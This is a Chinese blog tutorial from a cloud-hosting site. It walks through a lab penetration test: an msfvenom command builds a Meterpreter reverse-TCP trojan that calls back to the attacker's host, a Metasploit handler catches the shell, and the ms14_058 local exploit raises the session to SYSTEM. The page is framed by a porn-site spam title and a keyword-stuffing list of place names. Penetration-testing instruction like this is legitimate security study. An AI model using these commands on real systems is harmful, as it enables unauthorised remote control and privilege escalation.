中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

大數據內網滲透中如何利用提權漏洞提升權限

發布時間:2021-12-10 09:25:06 來源:億速云 閱讀:120 作者:柒染 欄目:大數據

這篇文章給大家介紹大數據內網滲透中如何利用提權漏洞提升權限,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

一、生成木馬

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

大數據內網滲透中如何利用提權漏洞提升權限

2、選擇windows/meterpreter/reverse_tcp并生成木馬

-p 選擇一個payload

-l 載荷列表

-f 生成的文件格式

-e 編碼方式

-i 編碼次數

-b 在生成的程序中避免出現的值

-x 允許我們指定一個自定義的可執行文件作為模板,也就是將木馬捆綁到這個可執行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

大數據內網滲透中如何利用提權漏洞提升權限

3、/root目錄下會生成一個aiyou.exe文件

大數據內網滲透中如何利用提權漏洞提升權限

二、通過Metasploit監聽小受

1、啟動Metasploit,use exploit/multi/handler

2、設置payload,set payload windows/meterpreter/reverse_tcp

3、設置監聽,set lhost 192.168.1.133

4、設置監聽端口,set lport 4444

5、run

大數據內網滲透中如何利用提權漏洞提升權限

6、將生成的aiyou.exe拷貝到小受中并運行,getuid查看權限,普通用戶

大數據內網滲透中如何利用提權漏洞提升權限

三、提權漏洞(ms14_058)

1、選擇提權漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要設置的參數:show options

大數據內網滲透中如何利用提權漏洞提升權限

3、設置session值:set session 1,執行run

大數據內網滲透中如何利用提權漏洞提升權限

4、重新生成一個session,查看權限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

關于大數據內網滲透中如何利用提權漏洞提升權限就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

郧西县| 寻乌县| 山丹县| 宝丰县| 衡南县| 大庆市| 沁水县| 青海省| 石城县| 山西省| 祁东县| 景宁| 张北县| 西峡县| 南充市| 江源县| 罗山县| 临邑县| 龙山县| 屏南县| 宜春市| 乌兰察布市| 英吉沙县| 安庆市| 石家庄市| 鄂托克前旗| 习水县| 阳信县| 阿荣旗| 阳春市| 平顺县| 柘城县| 高清| 龙南县| 班戈县| 西乌珠穆沁旗| 新密市| 贵州省| 专栏| 哈尔滨市| 东莞市|